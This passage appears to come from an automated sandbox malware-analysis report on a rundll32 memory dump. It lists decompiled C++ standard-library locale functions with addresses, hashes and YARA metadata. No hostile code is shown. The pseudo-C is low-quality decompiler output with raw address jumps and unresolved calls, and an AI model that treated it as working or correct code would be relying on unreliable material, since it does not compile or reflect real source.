                0x215205d934f
                0x215205d9357
                0x215205d9363
                0x215205d9368
                0x215205d936f
                0x215205d9377
                0x215205d9379
                0x215205d9381
                0x215205d9388
                0x215205d9392
                0x215205d9394
                0x215205d939d
                0x215205d939f
                0x215205d93a7
                0x215205d93ae
                0x215205d93b3
                0x215205d93b8
                0x215205d93c2
                0x215205d93cb
                0x215205d93d2
                0x215205d93e3
                0x215205d93e8
                0x215205d93e9
                0x215205d93ee
                0x215205d93ff
                0x215205d9407
                0x215205d942b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: da167aad7856e3ba21b3be2b8ab5d094c0073e4c2c9a5ec5bb6450e266d393ff
                • Instruction ID: a40f207e77cc832641a5642f7c0d6f4c21a27441bbcba9433e0a586f10a378df
                • Opcode Fuzzy Hash: da167aad7856e3ba21b3be2b8ab5d094c0073e4c2c9a5ec5bb6450e266d393ff
                • Instruction Fuzzy Hash: 26314B37306E20C1EB259B25E5582E96365EBE4BE0F280292DE6D477EDDF34D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D942C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D942C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681be0; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b30; // 0x0
				if (_t56 != 0) goto 0x205d94a7;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b30 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d9496;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b30 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b30; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d94bb;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d94bd;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d954a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d94e3;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d94e1;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d94e3;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d954a;
				if (_t79 == 0) goto 0x205d94f2;
				goto 0x205d954a;
				E00000215215205DC1CC(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205d9521;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681be0 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d942c
                0x215205d9434
                0x215205d943d
                0x215205d9442
                0x215205d944c
                0x215205d9452
                0x215205d9459
                0x215205d945e
                0x215205d9468
                0x215205d9471
                0x215205d9476
                0x215205d947d
                0x215205d947f
                0x215205d9487
                0x215205d948f
                0x215205d949b
                0x215205d94a0
                0x215205d94a7
                0x215205d94af
                0x215205d94b1
                0x215205d94b9
                0x215205d94c0
                0x215205d94ca
                0x215205d94cc
                0x215205d94d5
                0x215205d94d7
                0x215205d94df
                0x215205d94e6
                0x215205d94eb
                0x215205d94f0
                0x215205d94fa
                0x215205d9503
                0x215205d950a
                0x215205d951b
                0x215205d9520
                0x215205d9521
                0x215205d9526
                0x215205d9537
                0x215205d953f
                0x215205d9563

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 0ef970c2ea3b8764526f702f3153338c44b9fd474f913c094434638577a939ac
                • Instruction ID: c3c4746572941ec94bf1347527578996893a079be2cec264c116dff2e0afbc1d
                • Opcode Fuzzy Hash: 0ef970c2ea3b8764526f702f3153338c44b9fd474f913c094434638577a939ac
                • Instruction Fuzzy Hash: 99314A77306E20C1EA219B15E5582E963A5FFE4BE0F1802A2EE6D077EEDA34D4538700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D9564 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D9564(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c48; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b88; // 0x0
				if (_t56 != 0) goto 0x205d95df;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b88 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d95ce;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b88 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b88; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d95f3;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d95f5;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9682;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d961b;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9619;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d961b;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9682;
				if (_t79 == 0) goto 0x205d962a;
				goto 0x205d9682;
				E00000215215205DC290(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205d9659;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c48 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d9564
                0x215205d956c
                0x215205d9575
                0x215205d957a
                0x215205d9584
                0x215205d958a
                0x215205d9591
                0x215205d9596
                0x215205d95a0
                0x215205d95a9
                0x215205d95ae
                0x215205d95b5
                0x215205d95b7
                0x215205d95bf
                0x215205d95c7
                0x215205d95d3
                0x215205d95d8
                0x215205d95df
                0x215205d95e7
                0x215205d95e9
                0x215205d95f1
                0x215205d95f8
                0x215205d9602
                0x215205d9604
                0x215205d960d
                0x215205d960f
                0x215205d9617
                0x215205d961e
                0x215205d9623
                0x215205d9628
                0x215205d9632
                0x215205d963b
                0x215205d9642
                0x215205d9653
                0x215205d9658
                0x215205d9659
                0x215205d965e
                0x215205d966f
                0x215205d9677
                0x215205d969b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 026dc5216dc0aa7883aad31ee49c7557016df84f4355eefaa5ec4ae0ae8d509d
                • Instruction ID: 8eee153ed6ad32436623fd57ad0578f1cd93a15d0e04a1d628a115147397d5a8
                • Opcode Fuzzy Hash: 026dc5216dc0aa7883aad31ee49c7557016df84f4355eefaa5ec4ae0ae8d509d
                • Instruction Fuzzy Hash: F7314D37306E20C1EB219B25E5582E96365EFE4BE0F2802A2AE5D077EDDE34D447C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D969C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 59%
                			E00000215215205D969C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				void* __rbp;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681be8; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b38; // 0x0
				if (_t56 != 0) goto 0x205d9717;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b38 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d9706;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b38 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b38; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d972b;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d972d;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d97ba;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9753;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9751;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d9753;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d97ba;
				if (_t79 == 0) goto 0x205d9762;
				goto 0x205d97ba;
				E00000215215205DC354(0, 0, _t57,  &_a24, _t80, _t79, _t80);
				if (_t53 != 0xffffffff) goto 0x205d9791;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681be8 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}



















                0x215205d969c
                0x215205d96a4
                0x215205d96ad
                0x215205d96b2
                0x215205d96bc
                0x215205d96c2
                0x215205d96c9
                0x215205d96ce
                0x215205d96d8
                0x215205d96e1
                0x215205d96e6
                0x215205d96ed
                0x215205d96ef
                0x215205d96f7
                0x215205d96ff
                0x215205d970b
                0x215205d9710
                0x215205d9717
                0x215205d971f
                0x215205d9721
                0x215205d9729
                0x215205d9730
                0x215205d973a
                0x215205d973c
                0x215205d9745
                0x215205d9747
                0x215205d974f
                0x215205d9756
                0x215205d975b
                0x215205d9760
                0x215205d976a
                0x215205d9773
                0x215205d977a
                0x215205d978b
                0x215205d9790
                0x215205d9791
                0x215205d9796
                0x215205d97a7
                0x215205d97af
                0x215205d97d3

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: ebf53693ca61634d0f30798a3cd7d75bf852eab6759eb8b02bf82c5fc4930c9a
                • Instruction ID: 587268fa65b153a6f8dcb5f43f9b7ec9bb3ef60e7c8d6bfba1066cb80ead441b
                • Opcode Fuzzy Hash: ebf53693ca61634d0f30798a3cd7d75bf852eab6759eb8b02bf82c5fc4930c9a
                • Instruction Fuzzy Hash: 19318D37316E20C1EB249B25E9582E963A5EBE5BE0F284293DE6D077EDDE34D4538700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D97D4 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000215215205D97D4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c58; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b98; // 0x0
				if (_t56 != 0) goto 0x205d984f;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b98 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d983e;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b98 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b98; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9863;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d9865;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d98f2;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d988b;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9889;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d988b;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d98f2;
				if (_t79 == 0) goto 0x205d989a;
				goto 0x205d98f2;
				E00000215215205DC418(0, 0, _t57,  &_a24, _t80);
				if (_t53 != 0xffffffff) goto 0x205d98c9;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c58 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}


















                0x215205d97d4
                0x215205d97dc
                0x215205d97e5
                0x215205d97ea
                0x215205d97f4
                0x215205d97fa
                0x215205d9801
                0x215205d9806
                0x215205d9810
                0x215205d9819
                0x215205d981e
                0x215205d9825
                0x215205d9827
                0x215205d982f
                0x215205d9837
                0x215205d9843
                0x215205d9848
                0x215205d984f
                0x215205d9857
                0x215205d9859
                0x215205d9861
                0x215205d9868
                0x215205d9872
                0x215205d9874
                0x215205d987d
                0x215205d987f
                0x215205d9887
                0x215205d988e
                0x215205d9893
                0x215205d9898
                0x215205d98a2
                0x215205d98ab
                0x215205d98b2
                0x215205d98c3
                0x215205d98c8
                0x215205d98c9
                0x215205d98ce
                0x215205d98df
                0x215205d98e7
                0x215205d990b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: f495dc1e6ec0a961c91302726bed7290875b8ce15f498f7feb6d87f877cf8847
                • Instruction ID: 0505ab1c06daff74a81b16423123bccc3de5ff8943e5ebff825af262acabfefc
                • Opcode Fuzzy Hash: f495dc1e6ec0a961c91302726bed7290875b8ce15f498f7feb6d87f877cf8847
                • Instruction Fuzzy Hash: 06316B33706E60C1EB219B26E8582E96365EFE5BE0F2802939E6D077EDDE34D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D990C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000215215205D990C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681c50; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b90; // 0x0
				if (_t56 != 0) goto 0x205d9987;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b90 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d9976;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b90 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b90; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d999b;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d999d;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9a2a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d99c3;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d99c1;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d99c3;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9a2a;
				if (_t79 == 0) goto 0x205d99d2;
				goto 0x205d9a2a;
				E00000215215205DC4F8(0, 0, _t57,  &_a24, _t80);
				if (_t53 != 0xffffffff) goto 0x205d9a01;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681c50 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}


















                0x215205d990c
                0x215205d9914
                0x215205d991d
                0x215205d9922
                0x215205d992c
                0x215205d9932
                0x215205d9939
                0x215205d993e
                0x215205d9948
                0x215205d9951
                0x215205d9956
                0x215205d995d
                0x215205d995f
                0x215205d9967
                0x215205d996f
                0x215205d997b
                0x215205d9980
                0x215205d9987
                0x215205d998f
                0x215205d9991
                0x215205d9999
                0x215205d99a0
                0x215205d99aa
                0x215205d99ac
                0x215205d99b5
                0x215205d99b7
                0x215205d99bf
                0x215205d99c6
                0x215205d99cb
                0x215205d99d0
                0x215205d99da
                0x215205d99e3
                0x215205d99ea
                0x215205d99fb
                0x215205d9a00
                0x215205d9a01
                0x215205d9a06
                0x215205d9a17
                0x215205d9a1f
                0x215205d9a43

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 06c9a121b9170ac79d83c2c1fb836abff03bbcf052877500dedde9ed297f6708
                • Instruction ID: d86134e4fd85133d8aacf74673ea747252d218a44a09cfb6e121ced0eb7b0fe1
                • Opcode Fuzzy Hash: 06c9a121b9170ac79d83c2c1fb836abff03bbcf052877500dedde9ed297f6708
                • Instruction Fuzzy Hash: 39316B37306E20D1EA219B15E9682E96364EBF4BE0F180296EE6D477EDDE38D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D9A44 Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000215215205D9A44(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681bf8; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b48; // 0x0
				if (_t56 != 0) goto 0x205d9abf;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b48 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d9aae;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b48 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b48; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9ad3;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d9ad5;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9b62;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9afb;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9af9;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d9afb;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9b62;
				if (_t79 == 0) goto 0x205d9b0a;
				goto 0x205d9b62;
				E00000215215205DC5D8(0, 0, _t57,  &_a24, _t80);
				if (_t53 != 0xffffffff) goto 0x205d9b39;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681bf8 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}


















                0x215205d9a44
                0x215205d9a4c
                0x215205d9a55
                0x215205d9a5a
                0x215205d9a64
                0x215205d9a6a
                0x215205d9a71
                0x215205d9a76
                0x215205d9a80
                0x215205d9a89
                0x215205d9a8e
                0x215205d9a95
                0x215205d9a97
                0x215205d9a9f
                0x215205d9aa7
                0x215205d9ab3
                0x215205d9ab8
                0x215205d9abf
                0x215205d9ac7
                0x215205d9ac9
                0x215205d9ad1
                0x215205d9ad8
                0x215205d9ae2
                0x215205d9ae4
                0x215205d9aed
                0x215205d9aef
                0x215205d9af7
                0x215205d9afe
                0x215205d9b03
                0x215205d9b08
                0x215205d9b12
                0x215205d9b1b
                0x215205d9b22
                0x215205d9b33
                0x215205d9b38
                0x215205d9b39
                0x215205d9b3e
                0x215205d9b4f
                0x215205d9b57
                0x215205d9b7b

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: 8ee8e92f85bc13cf56f8620e03493eee014d88c90192d00410b336b4615e4c64
                • Instruction ID: a683d0ea72adeb92687fc36ce48f9d85ab876eb05c2ad70babd2d676ed9b0345
                • Opcode Fuzzy Hash: 8ee8e92f85bc13cf56f8620e03493eee014d88c90192d00410b336b4615e4c64
                • Instruction Fuzzy Hash: A9317E33306E60C1FB219B15E4582E96364EBE4BE0F294293AE6D077EDDE34D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205D9B7C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 61%
                			E00000215215205D9B7C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
				char _v48;
				long long _v56;
				void* __rsi;
				intOrPtr _t26;
				void* _t29;
				void* _t43;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t56;
				signed long long _t57;
				intOrPtr _t64;
				intOrPtr* _t78;
				long long _t79;
				void* _t80;

				_t51 = __rax;
				_v56 = 0xfffffffe;
				_a32 = __rbx;
				_t80 = __rcx;
				E00000215215205D19DC(0,  &_a16);
				_t79 =  *0x20681bf0; // 0x0
				_a24 = _t79;
				_t56 =  *0x20681b40; // 0x0
				if (_t56 != 0) goto 0x205d9bf7;
				E00000215215205D19DC(0,  &_a8);
				_t43 =  *0x20681b40 - _t56; // 0x0
				if (_t43 != 0) goto 0x205d9be6;
				_t26 =  *0x20681908; // 0x0
				 *0x20681908 = _t26 + 1;
				 *0x20681b40 = _t51;
				_t29 = E00000215215205D1A5C(_t51,  &_a8);
				_t57 =  *0x20681b40; // 0x0
				_t64 = _a8;
				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9c0b;
				_t52 =  *((intOrPtr*)(_t64 + 0x10));
				goto 0x205d9c0d;
				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9c9a;
				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9c33;
				E00000215215205D6CC0(_t29);
				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9c31;
				_t53 =  *((intOrPtr*)(_t52 + 0x10));
				goto 0x205d9c33;
				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9c9a;
				if (_t79 == 0) goto 0x205d9c42;
				goto 0x205d9c9a;
				E00000215215205DC6B8(0, 0, _t57,  &_a24, _t80);
				if (_t53 != 0xffffffff) goto 0x205d9c71;
				E00000215215205B7290( &_v48);
				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
				asm("int3");
				_t78 = _a24;
				 *0x20681bf0 = _t78;
				0x205f5ad4();
				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
			}


















                0x215205d9b7c
                0x215205d9b84
                0x215205d9b8d
                0x215205d9b92
                0x215205d9b9c
                0x215205d9ba2
                0x215205d9ba9
                0x215205d9bae
                0x215205d9bb8
                0x215205d9bc1
                0x215205d9bc6
                0x215205d9bcd
                0x215205d9bcf
                0x215205d9bd7
                0x215205d9bdf
                0x215205d9beb
                0x215205d9bf0
                0x215205d9bf7
                0x215205d9bff
                0x215205d9c01
                0x215205d9c09
                0x215205d9c10
                0x215205d9c1a
                0x215205d9c1c
                0x215205d9c25
                0x215205d9c27
                0x215205d9c2f
                0x215205d9c36
                0x215205d9c3b
                0x215205d9c40
                0x215205d9c4a
                0x215205d9c53
                0x215205d9c5a
                0x215205d9c6b
                0x215205d9c70
                0x215205d9c71
                0x215205d9c76
                0x215205d9c87
                0x215205d9c8f
                0x215205d9cb3

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
